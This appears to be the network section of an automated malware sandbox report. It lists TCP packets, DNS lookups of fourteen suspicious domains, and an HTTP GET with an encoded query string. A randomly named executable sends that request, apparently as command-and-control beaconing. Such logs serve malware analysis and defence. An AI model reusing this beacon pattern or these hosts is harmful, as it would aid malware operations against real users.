                                                                                          Nov 24, 2024 08:22:23.784879923 CET5001280192.168.2.5147.255.21.187
                                                                                          Nov 24, 2024 08:22:23.793912888 CET5001280192.168.2.5147.255.21.187
                                                                                          Nov 24, 2024 08:22:23.913405895 CET8050012147.255.21.187192.168.2.5
                                                                                          Nov 24, 2024 08:22:25.055861950 CET8050012147.255.21.187192.168.2.5
                                                                                          Nov 24, 2024 08:22:25.055876017 CET8050012147.255.21.187192.168.2.5
                                                                                          Nov 24, 2024 08:22:25.056018114 CET5001280192.168.2.5147.255.21.187
                                                                                          Nov 24, 2024 08:22:25.058815002 CET5001280192.168.2.5147.255.21.187
                                                                                          Nov 24, 2024 08:22:25.178359032 CET8050012147.255.21.187192.168.2.5
                                                                                          Nov 24, 2024 08:22:30.221101046 CET5001380192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:30.340879917 CET8050013172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:30.341187000 CET5001380192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:30.356466055 CET5001380192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:30.475991011 CET8050013172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:31.632987022 CET8050013172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:31.633028030 CET8050013172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:31.633086920 CET5001380192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:31.633270025 CET8050013172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:31.633313894 CET5001380192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:31.862757921 CET5001380192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:32.882255077 CET5001480192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:33.001893044 CET8050014172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:33.006393909 CET5001480192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:33.022430897 CET5001480192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:33.141927004 CET8050014172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:34.379933119 CET8050014172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:34.379996061 CET8050014172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:34.380152941 CET5001480192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:34.380616903 CET8050014172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:34.380762100 CET8050014172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:34.380831003 CET5001480192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:34.536478043 CET5001480192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:35.554310083 CET5001580192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:35.673857927 CET8050015172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:35.673943996 CET5001580192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:35.696445942 CET5001580192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:35.815988064 CET8050015172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:35.816004038 CET8050015172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:37.059489965 CET8050015172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:37.059573889 CET8050015172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:37.059844017 CET5001580192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:37.059855938 CET8050015172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:37.062344074 CET5001580192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:37.206387997 CET5001580192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:38.225400925 CET5001680192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:38.344975948 CET8050016172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:38.345096111 CET5001680192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:38.354875088 CET5001680192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:38.474431038 CET8050016172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:39.734849930 CET8050016172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:39.734920025 CET8050016172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:39.735023022 CET5001680192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:39.735606909 CET8050016172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:39.735658884 CET5001680192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:39.738493919 CET5001680192.168.2.5172.67.159.61
                                                                                          Nov 24, 2024 08:22:39.858079910 CET8050016172.67.159.61192.168.2.5
                                                                                          Nov 24, 2024 08:22:45.178277016 CET5001780192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:45.297983885 CET8050017172.67.168.228192.168.2.5
                                                                                          Nov 24, 2024 08:22:45.298418045 CET5001780192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:45.313941002 CET5001780192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:45.437223911 CET8050017172.67.168.228192.168.2.5
                                                                                          Nov 24, 2024 08:22:46.817184925 CET5001780192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:46.898960114 CET8050017172.67.168.228192.168.2.5
                                                                                          Nov 24, 2024 08:22:46.899616003 CET8050017172.67.168.228192.168.2.5
                                                                                          Nov 24, 2024 08:22:46.899740934 CET5001780192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:46.899740934 CET5001780192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:46.937028885 CET8050017172.67.168.228192.168.2.5
                                                                                          Nov 24, 2024 08:22:46.938386917 CET5001780192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:47.836960077 CET5001880192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:47.957818985 CET8050018172.67.168.228192.168.2.5
                                                                                          Nov 24, 2024 08:22:47.957931995 CET5001880192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:47.976769924 CET5001880192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:48.096451998 CET8050018172.67.168.228192.168.2.5
                                                                                          Nov 24, 2024 08:22:49.487700939 CET5001880192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:49.593923092 CET8050018172.67.168.228192.168.2.5
                                                                                          Nov 24, 2024 08:22:49.594053984 CET5001880192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:49.594228983 CET8050018172.67.168.228192.168.2.5
                                                                                          Nov 24, 2024 08:22:49.594285965 CET5001880192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:49.607198000 CET8050018172.67.168.228192.168.2.5
                                                                                          Nov 24, 2024 08:22:49.607247114 CET5001880192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:50.506387949 CET5001980192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:50.626182079 CET8050019172.67.168.228192.168.2.5
                                                                                          Nov 24, 2024 08:22:50.626461983 CET5001980192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:50.642451048 CET5001980192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:50.762130976 CET8050019172.67.168.228192.168.2.5
                                                                                          Nov 24, 2024 08:22:50.762242079 CET8050019172.67.168.228192.168.2.5
                                                                                          Nov 24, 2024 08:22:52.143904924 CET5001980192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:52.263792038 CET8050019172.67.168.228192.168.2.5
                                                                                          Nov 24, 2024 08:22:52.264008045 CET5001980192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:53.162750006 CET5002080192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:53.282624960 CET8050020172.67.168.228192.168.2.5
                                                                                          Nov 24, 2024 08:22:53.282789946 CET5002080192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:53.293205976 CET5002080192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:53.412888050 CET8050020172.67.168.228192.168.2.5
                                                                                          Nov 24, 2024 08:22:54.924420118 CET8050020172.67.168.228192.168.2.5
                                                                                          Nov 24, 2024 08:22:54.924940109 CET8050020172.67.168.228192.168.2.5
                                                                                          Nov 24, 2024 08:22:54.926351070 CET5002080192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:54.927496910 CET5002080192.168.2.5172.67.168.228
                                                                                          Nov 24, 2024 08:22:55.047025919 CET8050020172.67.168.228192.168.2.5
                                                                                          Nov 24, 2024 08:23:00.281244993 CET5002180192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:00.400727987 CET8050021194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:00.400810003 CET5002180192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:00.417012930 CET5002180192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:00.536479950 CET8050021194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:01.801975965 CET8050021194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:01.801986933 CET8050021194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:01.802045107 CET5002180192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:01.830919027 CET8050021194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:01.830929995 CET8050021194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:01.830935955 CET8050021194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:01.831042051 CET5002180192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:01.929816961 CET5002180192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:02.945605040 CET5002280192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:03.065185070 CET8050022194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:03.065452099 CET5002280192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:03.084314108 CET5002280192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:03.203839064 CET8050022194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:04.439945936 CET8050022194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:04.440076113 CET8050022194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:04.440087080 CET8050022194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:04.440120935 CET8050022194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:04.440140009 CET5002280192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:04.440176010 CET5002280192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:04.600471973 CET5002280192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:05.621515989 CET5002380192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:05.741117001 CET8050023194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:05.741213083 CET5002380192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:05.765959978 CET5002380192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:05.885704994 CET8050023194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:05.885715961 CET8050023194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:07.116357088 CET8050023194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:07.116419077 CET8050023194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:07.116457939 CET8050023194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:07.116506100 CET8050023194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:07.116769075 CET5002380192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:07.272418976 CET5002380192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:08.288230896 CET5002480192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:08.407875061 CET8050024194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:08.408034086 CET5002480192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:08.418742895 CET5002480192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:08.538249016 CET8050024194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:09.783698082 CET8050024194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:09.783721924 CET8050024194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:09.783732891 CET8050024194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:09.783840895 CET5002480192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:09.784446955 CET8050024194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:09.784488916 CET5002480192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:09.784508944 CET8050024194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:09.784518003 CET8050024194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:09.784596920 CET5002480192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:09.784672976 CET8050024194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:09.784681082 CET8050024194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:09.784688950 CET8050024194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:09.784697056 CET8050024194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:09.784708023 CET5002480192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:09.784744024 CET5002480192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:09.789931059 CET5002480192.168.2.5194.58.112.174
                                                                                          Nov 24, 2024 08:23:09.909491062 CET8050024194.58.112.174192.168.2.5
                                                                                          Nov 24, 2024 08:23:14.955135107 CET5002580192.168.2.5172.67.220.36
                                                                                          Nov 24, 2024 08:23:15.074649096 CET8050025172.67.220.36192.168.2.5
                                                                                          Nov 24, 2024 08:23:15.074742079 CET5002580192.168.2.5172.67.220.36
                                                                                          Nov 24, 2024 08:23:15.091051102 CET5002580192.168.2.5172.67.220.36
                                                                                          Nov 24, 2024 08:23:15.210639954 CET8050025172.67.220.36192.168.2.5
                                                                                          Nov 24, 2024 08:23:16.435247898 CET8050025172.67.220.36192.168.2.5
                                                                                          Nov 24, 2024 08:23:16.435511112 CET8050025172.67.220.36192.168.2.5
                                                                                          Nov 24, 2024 08:23:16.435571909 CET5002580192.168.2.5172.67.220.36
                                                                                          Nov 24, 2024 08:23:16.435597897 CET8050025172.67.220.36192.168.2.5
                                                                                          Nov 24, 2024 08:23:16.435642958 CET5002580192.168.2.5172.67.220.36
                                                                                          Nov 24, 2024 08:23:16.597313881 CET5002580192.168.2.5172.67.220.36
                                                                                          Nov 24, 2024 08:23:18.037925959 CET5002680192.168.2.5172.67.220.36
                                                                                          Nov 24, 2024 08:23:18.157622099 CET8050026172.67.220.36192.168.2.5
                                                                                          Nov 24, 2024 08:23:18.157999039 CET5002680192.168.2.5172.67.220.36
                                                                                          Nov 24, 2024 08:23:18.174545050 CET5002680192.168.2.5172.67.220.36
                                                                                          Nov 24, 2024 08:23:18.336416006 CET8050026172.67.220.36192.168.2.5
                                                                                          Nov 24, 2024 08:23:19.515904903 CET8050026172.67.220.36192.168.2.5
                                                                                          Nov 24, 2024 08:23:19.515942097 CET8050026172.67.220.36192.168.2.5
                                                                                          Nov 24, 2024 08:23:19.516005993 CET5002680192.168.2.5172.67.220.36
                                                                                          Nov 24, 2024 08:23:19.517179966 CET8050026172.67.220.36192.168.2.5
                                                                                          Nov 24, 2024 08:23:19.517249107 CET5002680192.168.2.5172.67.220.36
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Nov 24, 2024 08:19:56.311724901 CET5845553192.168.2.51.1.1.1
                                                                                          Nov 24, 2024 08:19:56.608311892 CET53584551.1.1.1192.168.2.5
                                                                                          Nov 24, 2024 08:20:13.026331902 CET5899053192.168.2.51.1.1.1
                                                                                          Nov 24, 2024 08:20:13.515646935 CET53589901.1.1.1192.168.2.5
                                                                                          Nov 24, 2024 08:20:28.445776939 CET6009453192.168.2.51.1.1.1
                                                                                          Nov 24, 2024 08:20:29.381656885 CET53600941.1.1.1192.168.2.5
                                                                                          Nov 24, 2024 08:20:44.117522001 CET6405053192.168.2.51.1.1.1
                                                                                          Nov 24, 2024 08:20:44.918813944 CET53640501.1.1.1192.168.2.5
                                                                                          Nov 24, 2024 08:20:59.321350098 CET5591953192.168.2.51.1.1.1
                                                                                          Nov 24, 2024 08:20:59.551650047 CET53559191.1.1.1192.168.2.5
                                                                                          Nov 24, 2024 08:21:13.944644928 CET5836053192.168.2.51.1.1.1
                                                                                          Nov 24, 2024 08:21:14.917897940 CET53583601.1.1.1192.168.2.5
                                                                                          Nov 24, 2024 08:21:29.663794994 CET4985953192.168.2.51.1.1.1
                                                                                          Nov 24, 2024 08:21:30.659902096 CET4985953192.168.2.51.1.1.1
                                                                                          Nov 24, 2024 08:21:31.263331890 CET53498591.1.1.1192.168.2.5
                                                                                          Nov 24, 2024 08:21:31.263364077 CET53498591.1.1.1192.168.2.5
                                                                                          Nov 24, 2024 08:21:46.038666010 CET5226653192.168.2.51.1.1.1
                                                                                          Nov 24, 2024 08:21:46.257069111 CET53522661.1.1.1192.168.2.5
                                                                                          Nov 24, 2024 08:22:00.694613934 CET5459853192.168.2.51.1.1.1
                                                                                          Nov 24, 2024 08:22:00.914685011 CET53545981.1.1.1192.168.2.5
                                                                                          Nov 24, 2024 08:22:15.278225899 CET5113253192.168.2.51.1.1.1
                                                                                          Nov 24, 2024 08:22:15.661079884 CET53511321.1.1.1192.168.2.5
                                                                                          Nov 24, 2024 08:22:30.070107937 CET6218053192.168.2.51.1.1.1
                                                                                          Nov 24, 2024 08:22:30.218441963 CET53621801.1.1.1192.168.2.5
                                                                                          Nov 24, 2024 08:22:44.768188000 CET6010753192.168.2.51.1.1.1
                                                                                          Nov 24, 2024 08:22:45.172195911 CET53601071.1.1.1192.168.2.5
                                                                                          Nov 24, 2024 08:23:00.017064095 CET5515553192.168.2.51.1.1.1
                                                                                          Nov 24, 2024 08:23:00.278650045 CET53551551.1.1.1192.168.2.5
                                                                                          Nov 24, 2024 08:23:14.805200100 CET5815853192.168.2.51.1.1.1
                                                                                          Nov 24, 2024 08:23:14.951472044 CET53581581.1.1.1192.168.2.5
                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Nov 24, 2024 08:19:56.311724901 CET192.168.2.51.1.1.10x672cStandard query (0)www.grandesofertas.funA (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:20:13.026331902 CET192.168.2.51.1.1.10x10a4Standard query (0)www.jijievo.siteA (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:20:28.445776939 CET192.168.2.51.1.1.10xc146Standard query (0)www.ytsd88.topA (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:20:44.117522001 CET192.168.2.51.1.1.10xeca2Standard query (0)www.bpgroup.siteA (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:20:59.321350098 CET192.168.2.51.1.1.10xe7e9Standard query (0)www.fortevision.xyzA (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:21:13.944644928 CET192.168.2.51.1.1.10x980bStandard query (0)www.rtpterbaruwaktu3.xyzA (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:21:29.663794994 CET192.168.2.51.1.1.10x380cStandard query (0)www.prhmcjdz.tokyoA (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:21:30.659902096 CET192.168.2.51.1.1.10x380cStandard query (0)www.prhmcjdz.tokyoA (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:21:46.038666010 CET192.168.2.51.1.1.10xc359Standard query (0)www.connecty.liveA (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:22:00.694613934 CET192.168.2.51.1.1.10xe3f4Standard query (0)www.tals.xyzA (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:22:15.278225899 CET192.168.2.51.1.1.10x3c41Standard query (0)www.50food.comA (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:22:30.070107937 CET192.168.2.51.1.1.10x97e3Standard query (0)www.zriaraem-skiry.sbsA (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:22:44.768188000 CET192.168.2.51.1.1.10xd79Standard query (0)www.nmgzjwh.netA (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:23:00.017064095 CET192.168.2.51.1.1.10x4fe0Standard query (0)www.sklad-iq.onlineA (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:23:14.805200100 CET192.168.2.51.1.1.10xf914Standard query (0)www.supernutra01.onlineA (IP address)IN (0x0001)false
                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Nov 24, 2024 08:19:56.608311892 CET1.1.1.1192.168.2.50x672cNo error (0)www.grandesofertas.funentri-domains.clickmax.ioCNAME (Canonical name)IN (0x0001)false
                                                                                          Nov 24, 2024 08:19:56.608311892 CET1.1.1.1192.168.2.50x672cNo error (0)entri-domains.clickmax.iossl.goentri.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Nov 24, 2024 08:19:56.608311892 CET1.1.1.1192.168.2.50x672cNo error (0)ssl.goentri.com13.248.221.243A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:19:56.608311892 CET1.1.1.1192.168.2.50x672cNo error (0)ssl.goentri.com76.223.74.74A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:20:13.515646935 CET1.1.1.1192.168.2.50x10a4No error (0)www.jijievo.siteall.wjscdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Nov 24, 2024 08:20:13.515646935 CET1.1.1.1192.168.2.50x10a4No error (0)all.wjscdn.com38.54.112.227A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:20:13.515646935 CET1.1.1.1192.168.2.50x10a4No error (0)all.wjscdn.com154.90.35.240A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:20:13.515646935 CET1.1.1.1192.168.2.50x10a4No error (0)all.wjscdn.com154.90.58.209A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:20:13.515646935 CET1.1.1.1192.168.2.50x10a4No error (0)all.wjscdn.com154.205.143.51A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:20:13.515646935 CET1.1.1.1192.168.2.50x10a4No error (0)all.wjscdn.com154.205.156.26A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:20:13.515646935 CET1.1.1.1192.168.2.50x10a4No error (0)all.wjscdn.com154.205.159.116A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:20:29.381656885 CET1.1.1.1192.168.2.50xc146No error (0)www.ytsd88.top47.76.213.197A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:20:44.918813944 CET1.1.1.1192.168.2.50xeca2No error (0)www.bpgroup.sitebpgroup.siteCNAME (Canonical name)IN (0x0001)false
                                                                                          Nov 24, 2024 08:20:44.918813944 CET1.1.1.1192.168.2.50xeca2No error (0)bpgroup.site74.48.143.82A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:20:59.551650047 CET1.1.1.1192.168.2.50xe7e9No error (0)www.fortevision.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:20:59.551650047 CET1.1.1.1192.168.2.50xe7e9No error (0)www.fortevision.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:21:14.917897940 CET1.1.1.1192.168.2.50x980bNo error (0)www.rtpterbaruwaktu3.xyzrtpterbaruwaktu3.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                          Nov 24, 2024 08:21:14.917897940 CET1.1.1.1192.168.2.50x980bNo error (0)rtpterbaruwaktu3.xyz103.21.221.87A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:21:31.263331890 CET1.1.1.1192.168.2.50x380cNo error (0)www.prhmcjdz.tokyoymx01.cnCNAME (Canonical name)IN (0x0001)false
                                                                                          Nov 24, 2024 08:21:31.263331890 CET1.1.1.1192.168.2.50x380cNo error (0)ymx01.cn8.210.46.21A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:21:31.263364077 CET1.1.1.1192.168.2.50x380cNo error (0)www.prhmcjdz.tokyoymx01.cnCNAME (Canonical name)IN (0x0001)false
                                                                                          Nov 24, 2024 08:21:31.263364077 CET1.1.1.1192.168.2.50x380cNo error (0)ymx01.cn8.210.46.21A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:21:46.257069111 CET1.1.1.1192.168.2.50xc359No error (0)www.connecty.live203.161.43.228A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:22:00.914685011 CET1.1.1.1192.168.2.50xe3f4No error (0)www.tals.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:22:00.914685011 CET1.1.1.1192.168.2.50xe3f4No error (0)www.tals.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:22:15.661079884 CET1.1.1.1192.168.2.50x3c41No error (0)www.50food.com147.255.21.187A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:22:30.218441963 CET1.1.1.1192.168.2.50x97e3No error (0)www.zriaraem-skiry.sbs172.67.159.61A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:22:30.218441963 CET1.1.1.1192.168.2.50x97e3No error (0)www.zriaraem-skiry.sbs104.21.42.77A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:22:45.172195911 CET1.1.1.1192.168.2.50xd79No error (0)www.nmgzjwh.net172.67.168.228A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:22:45.172195911 CET1.1.1.1192.168.2.50xd79No error (0)www.nmgzjwh.net172.64.171.187A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:23:00.278650045 CET1.1.1.1192.168.2.50x4fe0No error (0)www.sklad-iq.online194.58.112.174A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:23:14.951472044 CET1.1.1.1192.168.2.50xf914No error (0)www.supernutra01.online172.67.220.36A (IP address)IN (0x0001)false
                                                                                          Nov 24, 2024 08:23:14.951472044 CET1.1.1.1192.168.2.50xf914No error (0)www.supernutra01.online104.21.24.198A (IP address)IN (0x0001)false
                                                                                          • www.grandesofertas.fun
                                                                                          • www.jijievo.site
                                                                                          • www.ytsd88.top
                                                                                          • www.bpgroup.site
                                                                                          • www.fortevision.xyz
                                                                                          • www.rtpterbaruwaktu3.xyz
                                                                                          • www.prhmcjdz.tokyo
                                                                                          • www.connecty.live
                                                                                          • www.tals.xyz
                                                                                          • www.50food.com
                                                                                          • www.zriaraem-skiry.sbs
                                                                                          • www.nmgzjwh.net
                                                                                          • www.sklad-iq.online
                                                                                          • www.supernutra01.online
                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.54977513.248.221.243802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:19:56.752130985 CET478OUTGET /wu6o/?8z=PAJ2EBywaoPRtAODirkpgxGfmSmLR9nxYR74cZ8tmddFXtcUCShy8K9wuzURMr8ccmGJKuqH2xFlcoIZXBvtNP5JJHXZKyNT2DdIvKryYyf9MjUEDxaaWmViMTMmYuNlSg==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.grandesofertas.fun
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:19:57.933898926 CET612INHTTP/1.1 301 Moved Permanently
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:19:57 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 162
                                                                                          Connection: close
                                                                                          Location: https://www.grandesofertas.fun/wu6o/?8z=PAJ2EBywaoPRtAODirkpgxGfmSmLR9nxYR74cZ8tmddFXtcUCShy8K9wuzURMr8ccmGJKuqH2xFlcoIZXBvtNP5JJHXZKyNT2DdIvKryYyf9MjUEDxaaWmViMTMmYuNlSg==&afwXa=6nnHQlkprRILE
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-XSS-Protection: 1; mode=block
